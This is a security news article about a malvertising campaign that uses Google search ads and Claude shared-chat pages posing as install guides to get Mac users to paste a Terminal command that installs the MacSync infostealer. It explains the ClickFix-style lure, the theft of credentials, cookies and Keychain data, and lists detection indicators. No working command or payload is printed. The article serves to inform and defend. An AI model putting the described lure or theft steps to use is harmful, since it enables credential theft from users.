Claude chat lure exposes Mac users

Mac users searching for Claude installation help are being targeted by a malvertising campaign that turns Google-sponsored results and legitimate Claude shared-chat pages into a malware delivery route.

The campaign, disclosed on 10 May by security researcher Berk Albayrak, uses search ads that appear to point to Anthropic’s real claude. ai domain. Users looking for terms such as “Claude mac download” are led to a shared Claude chat that presents itself as an official “Claude Code on Mac” installation guide and urges them to paste a command into Terminal. That command silently downloads and runs a payload identified as a variant of the MacSync macOS infostealer.

The tactic is significant because it removes one of the clearest warning signs in online fraud: the suspicious domain. The destination shown in the ad is genuine, while the instructions inside the shared chat are attacker-controlled. The lure exploits the normal behaviour of developers and AI-tool users, many of whom are accustomed to copying installation commands from technical documentation.

The malicious instructions use encoded shell commands to retrieve scripts from attacker infrastructure. In one observed case, the loader ran almost entirely in memory, while another variant used separate infrastructure and a different payload. The stolen data can include browser credentials, cookies and macOS Keychain contents, which are then packaged and exfiltrated to the attacker’s server.

MacSync belongs to a wider group of macOS infostealer campaigns using ClickFix-style social engineering, where victims are asked to “fix” or “install” something by running commands themselves. That approach can bypass some checks associated with app bundles, because scripts launched directly through Terminal are not handled in the same way as downloaded applications opened through Finder.

The broader campaign family has also been seen collecting media files, iCloud data, Keychain entries and cryptocurrency wallet keys. Some variants replace legitimate wallet applications with trojanised versions, raising the risk for users who manage digital assets or work from developer machines containing SSH keys, repository tokens and cloud credentials.

The abuse of Claude-themed lures has been building through 2026. Earlier operations used fake Claude Code documentation pages, Squarespace-hosted pages, Google Sites and other user-generated content platforms to mimic trusted technical guidance. Windows users have also been targeted through fake Claude Code-related material and malicious VS Code extensions, though the campaign disclosed on 10 May focuses on macOS users and Claude shared chats.

Claude Code itself is Anthropic’s agentic coding tool, available through official channels for terminal, IDE, desktop app and browser workflows. That popularity makes it an attractive brand for attackers seeking developers, security practitioners and early adopters of AI coding tools. A search query about installing an AI assistant can therefore become the first step in a credential-theft chain.

The campaign also exposes a broader weakness in the trust model around online advertising and shared AI content. Search ads can place malicious instructions above legitimate results, while public AI-generated or shared pages may inherit trust from the platform’s main domain. Users may look at the domain, see a familiar brand and miss small indicators that the content is merely shared material rather than official documentation.

Google has said its advertising systems blocked or removed more than 8.3 billion policy-violating ads and suspended 24.9 million advertiser accounts in 2025, with AI systems helping detect harmful activity before it reaches users. The persistence of these campaigns, however, shows that attackers continue to find gaps by combining verified-looking ads, trusted domains and fast-changing payload infrastructure.

Security teams are being urged to monitor for unusual Terminal activity, encoded shell commands, unexpected osascript execution, suspicious outbound connections and attempts to access Keychain or browser credential stores. Users should obtain Claude apps and Claude Code only from official Anthropic documentation, avoid sponsored links for software installation, and treat any webpage asking them to paste a Terminal command as high-risk unless the command is verified independently.